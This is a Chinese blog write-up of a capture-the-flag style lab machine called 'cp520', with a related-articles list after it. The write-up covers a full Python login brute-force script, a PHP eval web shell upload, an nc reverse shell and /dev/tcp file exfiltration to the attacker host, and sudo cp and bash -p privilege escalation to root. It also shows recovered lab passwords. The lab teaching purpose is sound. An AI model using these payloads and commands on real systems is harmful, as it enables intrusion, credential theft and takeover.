当前位置：首页 > article >正文

cp520靶场学习笔记

article 2026/5/21 3:38:00

正文1、端口扫描2、web登录页面用户密码爆破3、文件上传漏洞利用4、nc 反弹5、Linux用户检索与特权分析6、图片隐写7、解密与格式转换8、cp命令横向获取用户密码9、diff命令进行文件比较正文kali攻击机地址192.168.1.4靶场地址192.168.1.151、端口扫描在kali里使用nmap工具nmap-sV-v-T4-A192.168.1.15发现80和22端口开放访问网页2、web登录页面用户密码爆破抓包发现不填验证码输入用户名和密码也能返回“无效的用户名和密码”编写密码爆破脚本1.py:importrequestsimportrandomimportsysfromCrypto.PublicKeyimportRSAfromCrypto.CipherimportPKCS1_v1_5frombase64importb64encodefromtypingimportOptional,Dict# 全局会话复用连接sessionrequests.Session()# 设置全局请求超时秒TIMEOUT10# 目标登录URLLOGIN_URLhttp://192.168.1.15/login.php# RSA公钥去除多余缩进避免解析失败PUBLIC_KEY-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtLlBu4KjqP4t7Bc6bf/2 1TrHJbKl5iGfAlxn/c1WxbjhA/BRoQNpGX78oROMarMDJnS2ddJBtpdAnovE3o NX45Eb1eTH9Isis/3mIXgVhuQ0Fhi11eo82hFQRXZOolJwfGqm7lL4r6OQJ96zur IodiC2uxcmR/YDjrhZhMlUYG2/OTm1bROEg1FV9gARh27SA4/VLbBsst69wS8Wj m5fPQGd31QBN/8UvwyT/QCTpQdxV3PARXORVsdYLDiNSrwwO/cq6gNwthLxhbS he40vUae0GtJjpkD5xJhkRXGuoj/D3/cd4KytNeiGezIeLQrAER6kf6B8vHoPfk eQIDAQAB -----END PUBLIC KEY-----defencrypt_password(password:str)-Optional[str]: RSA加密密码兼容前端JSEncrypt的PKCS1_v1_5填充 :param password: 原始密码字符串 :return: 加密后的base64字符串失败返回None try:rsa_keyRSA.importKey(PUBLIC_KEY)cipherPKCS1_v1_5.new(rsa_key)# 加密需编码为bytesencrypted_bytescipher.encrypt(password.encode(utf-8))# base64编码并转回字符串returnb64encode(encrypted_bytes).decode(utf-8)exceptExceptionase:print(f[!] 密码加密失败{e}| 密码{password})returnNonedeflogin(username:str,password:str)-Optional[Dict]: 发送登录请求 :param username: 用户名 :param password: 原始密码 :return: 登录响应的JSON数据失败返回None # 加密密码enc_passwordencrypt_password(password)ifnotenc_password:returnNone# 登录请求参数data{username:username,password:enc_password,captcha:# 若目标需验证码需补充验证码识别/输入逻辑}try:# 发送POST请求JSON格式responsesession.post(urlLOGIN_URL,jsondata,timeoutTIMEOUT,headers{User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36,Content-Type:application/json})# 检查响应状态码response.raise_for_status()returnresponse.json()exceptrequests.exceptions.Timeout:print(f[!] 登录请求超时{TIMEOUT}秒 | 密码{password})exceptrequests.exceptions.ConnectionError:print(f[!] 目标服务器连接失败 | 密码{password})exceptrequests.exceptions.HTTPErrorase:print(f[!] HTTP请求错误{e}| 密码{password})exceptExceptionase:print(f[!] 登录请求异常{e}| 密码{password})returnNonedefbrute_force_login(username:str,pass_file_path:str)-None: 密码爆破主逻辑 :param username: 目标用户名 :param pass_file_path: 密码字典文件路径 # 读取密码字典try:withopen(pass_file_path,r,encodingutf-8)asf:passwords[line.strip()forlineinfifline.strip()]exceptFileNotFoundError:print(f[!] 密码文件不存在{pass_file_path})sys.exit(1)exceptPermissionError:print(f[!] 无权限读取密码文件{pass_file_path})sys.exit(1)exceptExceptionase:print(f[!] 读取密码文件异常{e})sys.exit(1)totallen(passwords)iftotal0:print([!] 密码字典为空)sys.exit(1)print(f[*] 开始密码爆破 | 用户名{username}| 密码总数{total})print(-*50)# 遍历密码爆破foridx,passwordinenumerate(passwords,1):print(f[{idx}/{total}] 尝试密码{password},end )resultlogin(username,password)ifnotresult:print(→ 请求失败)continue# 登录成功判断根据实际响应调整success字段ifresult.get(success):print(\n*50)print(f[] 爆破成功用户名{username}| 密码{password})print(*50)# 可在此处添加后续操作如访问后台、保存结果等sys.exit(0)else:error_msgresult.get(error,未知错误)print(f→ 登录失败{error_msg})# 爆破完成未找到密码print(-*50)print([!] 密码爆破完成未找到有效密码)if__name____main__:# 命令行参数校验用法python 1.py 用户名密码字典路径iflen(sys.argv)!3:print(用法python {} 用户名密码字典文件路径.format(sys.argv[0]))print(示例python {} admin pass.txt.format(sys.argv[0]))sys.exit(1)# 获取命令行参数target_usernamesys.argv[1]target_pass_filesys.argv[2]# 执行爆破brute_force_login(target_username,target_pass_file)拿到admin用户密码justine3、文件上传漏洞利用登录进去后是个文件上传目录扫描能扫出来文件上传的路径dirsearch-u192.168.1.15上传一句话木马文件到/uploads/目录下?php eval($_POST[x]);?4、nc 反弹蚁键右键打开终端输入busyboxnc192.168.1.44444-e/bin/bashkail记得开启4444端口监听nc-lp4444kali调整bash格式/usr/bin/script-qc/bin/bash /dev/null CTRLZ stty raw -echo;fgreset xterm5、Linux用户检索与特权分析回到家目录发现两个用户ihatemath和ilovelinux从根目录开始查找所有 “所属用户组是 ihatemath”、 “所属用户组是 ilovelinux” 的文件或目录同时忽略查找过程中出现的权限不足、文件不存在等错误提示find/-groupihatemath2/dev/nullfind/-groupilovelinux2/dev/null将本地/var/local/images.jpg文件内容通过TCP协议发送到 IP 为 192.168.1.4、端口为 1234 的远程主机上。cat/var/local/images.jpg/dev/tcp/192.168.1.4/1234kail配置nc-lvp1234images.jpg# 用nc监听接收数据并写入文件# 若无nc也可通过bash监听cat received_images.jpg /dev/tcp/0.0.0.0/12346、图片隐写查看图片隐藏属性exiftool images.jpg发现摩斯码7、解密与格式转换解码后发现还要转HEX:转换后拿到ilovelinux用户的hash密码48415050595f445241474f4e5f424f41545f464553544956414csshilovelinux192.168.1.15#然后输入密码查看ilovelinux用户的特权操作输出内容含义Matching Defaults entries for ilovelinux on cp520:开始展示ilovelinux用户在cp520主机上的 sudo 默认配置env_reset, mail_badpass, secure_path...sudo 默认配置项-env_reset执行 sudo 命令时重置环境变量保证安全-mail_badpass密码错误时发送邮件提醒通常给 root-secure_pathsudo 执行命令时的默认 PATH 路径限定命令查找范围防止恶意脚本User ilovelinux may run the following commands on cp520:核心结果明确ilovelinux用户在cp520主机上可执行的 sudo 命令(ihatemath) /bin/cp授权详情最关键-(ihatemath)可切换到ihatemath用户身份执行括号内是允许切换的用户若为(ALL)则可切换到任意用户-/bin/cp仅允许执行/bin/cp命令Linux 系统的文件复制命令8、cp命令横向获取用户密码那就执行复制命令拿到ihatemath用户的口令3c5611f0ae3ftouch/tmp/achmod777/tmp/als-l/tmp/asudo-uihatemath /bin/cp /opt/ihatemath.pass /tmp/acat/tmp/a命令 / 输出内容含义与核心目的touch /tmp/a核心操作在/tmp目录创建空文件a。✨ 目的为后续复制敏感文件内容做 “载体”/tmp是所有用户可读写的公共目录。chmod 777 /tmp/a核心操作修改/tmp/a的权限为777所有用户可读、可写、可执行。✨ 目的确保ihatemath用户后续执行cp的身份能向这个文件写入内容避免权限不足。ls -l /tmp/a验证操作查看/tmp/a的权限和属性。输出解读--rwxrwxrwx权限为 777所有人可读写执行-1 ilovelinux ilovelinux文件属主 / 属组是ilovelinux-0文件大小为 0空文件✨ 目的确认权限修改成功为后续复制铺路。sudo -u ihatemath /bin/cp /opt/ihatemath.pass /tmp/a核心利用以ihatemath用户身份执行授权的/bin/cp命令将/opt/ihatemath.passilovelinux无权限直接读取的敏感文件复制到/tmp/a。✨ 关键ilovelinux本身读不了/opt/ihatemath.pass但能通过sudo切换到ihatemath执行cp间接获取文件内容。cat /tmp/a读取结果查看/tmp/a的内容输出3c5611f0ae3f大概率是ihatemath的密码哈希 / 明文密码。✨ 目的通过可读写的/tmp/a拿到原本无权限访问的敏感文件内容。su -成功切换到ihatemath用户查看ihatemath用户的特权操作并执行9、diff命令进行文件比较通过以下命令拿到root目录下的flagdiffwhatsthis /bin/bash ./whatsthis-pcd/root命令 / 输出内容含义与核心目的diff whatsthis /bin/bashdiff命令对比whatsthis和系统原生/bin/bash。✨ 无任何输出说明两个文件二进制内容完全一致whatsthis是bash的完整副本。./whatsthis -p执行当前目录下的whatsthis文件并传入-p参数。✨-p是bash的特权模式参数作用是即使进程的有效用户 IDEUID与实际用户 IDUID不一致也不重置环境变量、不降低权限保留特权。cd /ro执行./whatsthis -p后提示符从$变成了#说明你已经获得了root 权限#是 root 用户的提示符。后面的cd /ro是输入到一半的命令大概率是cd /root切换到 root 家目录。

cp520靶场学习笔记

相关文章：

cp520靶场学习笔记

AOCODARC-F7MINI飞控固件编译踩坑记：从‘make arm_sdk_install’失败到成功编译

C++ STL常用函数一览表（快速记忆版本）

不止是省9.9刀：解锁特斯拉Model 3的‘行驶中保持WiFi’功能，打造家庭移动娱乐中心

STM32 HAL库驱动中景园0.96寸OLED（SSD1306）避坑指南：从IIC地址到GRAM刷新的完整流程

Kimi、DeepSeek、阶跃星辰三天融资超百亿，中国AI的“中场战事”刚刚开始

未来5年，程序员换工作，请做好降薪准备！

API 监控告警系统

Midjourney × CLO 3D无缝协同方案（工业级打版前必读）：实现AI草图→虚拟缝合→力学模拟零损转换

企业级RAG系统数据可信生死线：Perplexity验证功能内测权限仅剩最后17个——附白名单申请通道

有这5个迹象，说明你公司内斗很严重！

光纤干涉条纹投射导向的动态三维形貌测量技术【附程序】

Dify系列课程 - 5.Ollama：轻松驾驭本地大语言模型(在 Windows 上安装 Ollama 并部署 DeepSeek 大模型)

勒索病毒防线与数据恢复能力：四家云厂商安全水位线横向测评

序列近似整数规划导向的通用高性能离散变量拓扑优化新方法【附算法】

脉冲神经网络与测试时自适应技术解析

类型转换：隐式、显式与类型提升

KING大咖直播｜驯服时间洪流：电科金仓KES时序版“硬核”解码

磁性衬底导向的宽带超材料吸波体的吸波机理及设计方案【附代码】

电铲自主行走多耦合行为及轨迹控制技术【附代码】

夹矸煤层采煤机螺旋滚筒工作性能优化【附代码】

从音箱分频到电源净化：聊聊RLC低通滤波器那些意想不到的实用场景

盒子定位（Mac版）

抖音视频批量下载神器：3分钟学会无水印批量下载技巧

构建AI应用时如何借助Taotoken实现模型的灵活选型与降级

顶尖销售都在读什么？这三本书揭示理解客户的奥秘

用51单片机和HC-SR04超声波模块，手把手教你做个倒车防撞提醒器（附完整代码和立创EDA原理图）

别再死记硬背公式了！用‘推磨小矮人’和‘磁极跳舞’理解PMSM的电角度与机械角度

DeepSeek企业级部署GPU清单（2024Q3权威更新）：仅3款消费级卡达标，87%私有云环境需重构PCIe拓扑

RT-Thread下lwIP协议栈内存优化实战：从300KB降至120KB